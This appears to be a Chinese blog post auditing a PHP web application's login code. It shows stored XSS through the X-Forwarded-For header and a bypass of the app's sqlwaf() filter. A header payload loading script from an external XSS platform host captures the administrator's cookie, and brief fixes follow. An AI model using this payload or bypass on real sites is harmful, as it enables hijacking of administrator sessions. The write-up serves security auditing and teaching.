前言:
x-forwarded-for
大家應該都不陌生,是用來獲取客戶端的ip地址的,在實際開發應用中也是非常廣泛的,今天這篇博客的主要內容就是x-forwarded-for
注入xss
代碼來獲得管理員cookie
。
審計的源碼還是上次install.php
重裝漏洞的源碼。
步驟:
1.訪問正常用戶登錄頁面如下:2.找到源碼中對應的文件進行審計,代碼如下:
<?php
include_once('../sys/config.php');
if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
$clean_name = clean_input($_POST['user']);
$clean_pass = clean_input($_POST['pass']);
$query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
$data = mysql_query($query, $conn) or die('Error!!');
if (mysql_num_rows($data) == 1) {
$row = mysql_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
$_SESSION['avatar'] = $row['user_avatar'];
$ip = sqlwaf(get_client_ip()); //活得客戶端ip地址
$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
mysql_query($query, $conn) or die("updata error!");
header('Location: user.php');
}
else {
$_SESSION['error_info'] = '用戶名或密碼錯誤';
header('Location: login.php');
}
mysql_close($conn);
}
else {
not_find($_SERVER['PHP_SELF']);
}
?>
3.通過上面的代碼知道存在$ip = sqlwaf(get_client_ip());
是用來獲取客戶端的ip地址的,但是進入到了sqlwaf()
函數裏面,繼續跟蹤sqlwaf()
代碼如下:
function sqlwaf( $str ) {
$str = str_ireplace( "and", "sqlwaf", $str );
$str = str_ireplace( "or", "sqlwaf", $str );
$str = str_ireplace( "from", "sqlwaf", $str );
$str = str_ireplace( "execute", "sqlwaf", $str );
$str = str_ireplace( "update", "sqlwaf", $str );
$str = str_ireplace( "count", "sqlwaf", $str );
$str = str_ireplace( "chr", "sqlwaf", $str );
$str = str_ireplace( "mid", "sqlwaf", $str );
$str = str_ireplace( "char", "sqlwaf", $str );
$str = str_ireplace( "union", "sqlwaf", $str );
$str = str_ireplace( "select", "sqlwaf", $str );
$str = str_ireplace( "delete", "sqlwaf", $str );
$str = str_ireplace( "insert", "sqlwaf", $str );
$str = str_ireplace( "limit", "sqlwaf", $str );
$str = str_ireplace( "concat", "sqlwaf", $str );
$str = str_ireplace( "script", "sqlwaf", $str );
$str = str_ireplace( "\\", "\\\\", $str );
$str = str_ireplace( "&&", "sqlwaf", $str );
$str = str_ireplace( "||", "", $str );
$str = str_ireplace( "'", "", $str );
$str = str_ireplace( "%", "\%", $str );
$str = str_ireplace( "_", "\_", $str );
return $str;
}
4.通過過濾的代碼其實是可以繞過waf
進行注入的,就拿<script>alert(/xss/)</script>
爲例:輸入<s||cript>alert(/xss/)</s||cript>
即可繞過sqlwaf()函數(原理是什麼大家自己看sqlwaf()的代碼)。
既然知道了如何進行繞過了,那我們在登陸前通過burpsuite
或者modify Headers
(瀏覽器插件)修改x-forwarded-for爲:<sCRiPt/SrC=//xsshs.cn/UOZf>
(本人xss平臺代碼)
burpsuite修改方式:
modify Headers修改方式:
5.登錄成功了以後,由於是本地搭建和審計的,所以我們打開數據庫,看是否將我們構造的xss語句帶入到數據庫中了,可以看到確實是插入成功了。
6.此時更換管理員賬號進行登錄,繼續審計代碼找到管理員查看文件代碼:
<?php
include_once('../sys/config.php');
if (isset($_SESSION['admin'])) {
include_once('../header.php');
$query = "SELECT * FROM users ORDER BY user_id";
$data = mysql_query($query, $conn) or die('Error');
mysql_close($conn);
?>
<table class="items table">
<thead>
<tr>
<th id="yw0_c0">Id</th>
<th id="yw0_c4">Name</th>
<th id="yw0_c4">Ip</th>
<th id="yw0_c4">Manege</th>
</thead>
<tbody>
<?php while ($users = mysql_fetch_array($data)) {
$html_user_name = htmlspecialchars($users['user_name']);
?>
<tr class="odd">
<td><?php echo $users['user_id'];?></a></td>
<td><?php echo $html_user_name;?></td>
<td><?php echo $users['login_ip'];?></td>
<td><a href="delUser.php?id=<?php echo $users['user_id'];?>">刪除</a></td>
</tr>
<?php } ?>
</tbody>
</table>
<a href="manage.php">返回</a>
<?php
require_once('../footer.php');
}
else {
not_find($_SERVER['PHP_SELF']);
}
?>
7.通過上面的代碼分析可以看到<?php echo $users['login_ip'];?>
直接在數據庫中調用了當前變量進行輸出,未做任何過濾,通過管理員頁面訪問。
8.成功觸發xss:
9.後面就是通過cookie登錄後臺地址就不演示了,都是很簡單的操作
修復:
在sqlwaf()中加入過濾xss的代碼,例如html實體化操作等。
管理員頁面查看用戶信息時,進行嚴格過濾。